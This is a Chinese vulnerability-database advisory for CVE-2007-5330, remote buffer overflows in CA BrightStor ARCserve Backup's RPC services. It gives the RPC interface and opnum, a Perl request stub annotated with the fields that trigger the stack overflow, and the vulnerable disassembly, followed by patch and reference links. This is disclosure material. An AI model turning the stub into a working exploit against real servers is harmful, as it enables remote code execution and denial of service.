漏洞信息详情
CA BrightStor ARCserve Backup 缓冲区错误漏洞
- CNNVD编号:CNNVD-200710-240
- 危害等级: 超危
![图片[1]-CA BrightStor ARCserve Backup 缓冲区错误漏洞-一一网](https://www.proyy.com/skycj/data/images/2021-09-08/c4e67a37c54aee8c0e1983d8333a9158.png)
- CVE编号:
CVE-2007-5330
- 漏洞类型:
缓冲区错误
- 发布时间:
2007-10-12
- 威胁类型:
远程
- 更新时间:
2021-04-08
- 厂 商:
ca - 漏洞来源:
Dyon Baldingcocoru… -
漏洞简介
BrightStor ARCserve Backup可为各种平台的服务器提供备份和恢复保护功能。
BrightStor ARCserve Backup的消息引擎、AScore.dll、rpcx.dll等组件在处理超长RPC请求时存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞控制服务器或导致拒绝服务。
其中对于消息引擎中的溢出,起因是消息引擎没有正确地处理发送给TCP 6504端口的RPC请求。该接口识别为506b1890-14c8-11d1-bbc3-00805fa6962e v1.0,Opnum 0x10d指定了这个接口中有漏洞的操作。
0x10d函数的IDL如下:
long sub_28EA5F70 (
[in] handle_t arg_1,
[in, out][size_is(256), length_is(1)] struct struct_2 * arg_2,
[in][string] char * arg_3,
[in][string] char * arg_4,
[in][string] char * arg_5,
[in][string] char * arg_6,
[in][string] char * arg_7,
[in] long arg_8,
[out][size_is(arg_1)] byte * arg_9
);
以下是这个函数正常的stub:
my $stub=
x00x01x00x00x00x00x00x00x01x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00 .
x00x00x00x00x00x00x00x00x00x00x00x00 .
x10x00x00x00x00x00x00x00 . #point1: the victim s computer name
x10x00x00x00 .
kkk-49ade5b31c1 .
x00 .
x09x00x00x00x00x00x00x00x09x00x00x00 . #point2: a string,set it long
Database .
x00x00x00x00 .
x01x00x00x00x00x00x00x00x01x00x00x00 .
x00x00x00x00 .
x1ax00x00x00x00x00x00x00x1ax00x00x00 .
RemoteDatabaseMachineName .
x00x00x00 .
x01x00x00x00x00x00x00x00x01x00x00x00 .
x00x79x49x6ex40x00x00x00 ;
如果将#point1设置为等于受害用户的计算机名称,将#point2设置为超长字符串,就会触发栈溢出。有漏洞的代码如下:
.text:25604EF8 lea edx, [esp+120h+SubKey]
.text:25604EFC push offset asc_2561E2BC
.text:25604F01 push edx ;
.text:25604F02 call edi ; lstrcatA ;
.text:25604F04 lea eax, [esp+120h+SubKey]
.text:25604F08 push esi ;
.text:25604F09 push eax
.text:25604F0A call edi ; lstrcatA ; overflow!
由于没有对某些函数执行正确的认证检查,因此远程攻击者可以在系统上执行某些特权操作。
如果向BrightStor ARCserve Backup的dbasvr、RPC服务等组件发送了特制请求的话,就可能触发内存破坏,导致拒绝服务或执行任意指令。
漏洞公告
目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
http://supportconnect.ca.com/sc/redir.jsp?reqPage=search&searchID=QO91097
参考网址
来源:SECUNIA
链接:http://secunia.com/advisories/27192
来源:MISC
链接:http://secunia.com/secunia_research/2007-62/advisory/
来源:BUGTRAQ
链接:http://www.securityfocus.com/archive/1/482121/100/0/threaded
来源:BID
链接:https://www.securityfocus.com/bid/26015
来源:CONFIRM
链接:http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp
来源:OSVDB
来源:OSVDB
来源:VUPEN
链接:http://www.vupen.com/english/advisories/2007/3470
来源:XF
链接:https://exchange.xforce.ibmcloud.com/vulnerabilities/37070
来源:SECTRACK
![[桜井宁宁]COS和泉纱雾超可爱写真福利集-一一网](https://www.proyy.com/skycj/data/images/2020-12-13/4d3cf227a85d7e79f5d6b4efb6bde3e8.jpg)
![[桜井宁宁] 爆乳奶牛少女cos写真-一一网](https://www.proyy.com/skycj/data/images/2020-12-13/d40483e126fcf567894e89c65eaca655.jpg)
